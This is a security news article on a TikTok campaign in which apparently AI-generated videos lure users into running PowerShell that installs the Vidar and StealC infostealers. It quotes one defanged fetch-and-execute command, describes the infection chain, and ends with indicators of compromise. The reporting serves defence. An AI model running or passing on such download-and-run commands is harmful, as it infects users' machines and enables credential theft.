Beware: Trending TikTok Videos Promoting Pirated Apps Spread Stealer Malware

A new wave of social engineering attacks is leveraging TikTok’s viral video platform to distribute information-stealing malware, with campaigns now delivering Vidar and StealC infostealers through deceptive, AI-generated videos.

These videos, which have garnered hundreds of thousands of views, instruct users to execute PowerShell commands under the guise of activating pirated or premium software, including Windows OS, Microsoft Office, CapCut, and Spotify.

AI-Generated Social Engineering Campaigns

The attackers exploit TikTok’s algorithmic amplification and vast user base, using faceless, potentially AI-generated accounts to post instructional content.

Stealer Malware
The profile page of a TikTok user account

Notably, accounts such as @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771 have been identified as part of this campaign, though they are now inactive.

The videos are uniform in presentation, with minor variations in camera angles and download URLs, suggesting automated production.

The synthesized instructional voice further indicates the use of AI tools to scale the campaign.

The attack chain begins when viewers, convinced by the legitimacy of the instructions, are guided to open PowerShell and execute a command such as:

powershelliex (irm hxxps://allaivo[.]me/spotify)

This command triggers the download and execution of a remote script that initiates the infection process.

The script creates hidden directories in the user’s APPDATA and LOCALAPPDATA folders, adds these locations to Windows Defender’s exclusion list to evade detection, and retrieves a secondary payload either Vidar or StealC malware from a remote server.

The malware is then executed as a hidden, elevated process. For persistence, an additional PowerShell script is downloaded and set to run at startup via a registry key.

Stealer Malware
malicious PowerShell script

Temporary folders are deleted to minimize forensic traces, and robust error handling ensures the infection proceeds uninterrupted.

Vidar and StealC Infostealers

Once installed, Vidar and StealC reach out to their command-and-control (C&C) infrastructure, which includes abuse of legitimate services like Steam and Telegram as Dead Drop Resolvers (DDR) to conceal C&C server details.

Vidar, for example, embeds C&C IP addresses within Steam profile content, while StealC communicates with dedicated C&C URLs and IPs.

The campaign’s technical sophistication and use of trusted platforms make detection and disruption particularly challenging.

The implications for both individual users and organizations are significant. Traditional security solutions that rely on malicious code detection or domain reputation are less effective against attacks that exploit social engineering through visual and auditory cues.

The absence of malicious code on TikTok itself means that all actionable content is delivered through video, bypassing conventional scanning mechanisms.

This elevates the risk of credential theft, data exfiltration, and potential compromise of sensitive systems for both consumers and businesses.

Mitigation requires a multifaceted approach. Security teams should expand monitoring to include social media platforms, integrating threat intelligence feeds that track high-engagement content with technical instructions.

Behavioral analysis is critical, focusing on anomalous activities such as unexpected PowerShell execution, unauthorized downloads, and changes to security settings.

User awareness training must evolve to address the risks of AI-generated social engineering, encouraging skepticism toward unsolicited technical advice and promoting the verification of video sources.

Trend Vision One has been updated to detect and block the indicators of compromise (IOCs) associated with this campaign, and provides hunting queries and threat intelligence for proactive defense.

Organizations are encouraged to leverage such platforms for continuous monitoring and rapid response to emerging threats.

Indicators of Compromise (IOC)

TypeValue
File Hash3bb81c977bb34fadb3bdeac7e61193dd009725783fb2cf453e15ced70fc39e9
File Hashafc72f0d8f24657d0090566ebda910a3be89d4bdd68b029a99a19d146d63adc5
File Hashb8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886
URLhxxp://91[.]92[.]46[.]70/1032c730725d1721[.]php
URLhxxps://allaivo[.]me/spotify
URLhxxps://amssh[.]co/file[.]exe
URLhxxps://amssh[.]co/script[.]ps1
URLhxxps://steamcommunity[.]com/profiles/76561199846773220
URLhxxps://t[.]me/v00rd
IP49[.]12[.]113[.]201
IP116[.]202[.]6[.]216

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates

Mandvi
Mandvi
Mandvi is a Security Reporter covering data breaches, malware, cyberattacks, data leaks, and more at Cyber Press.

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here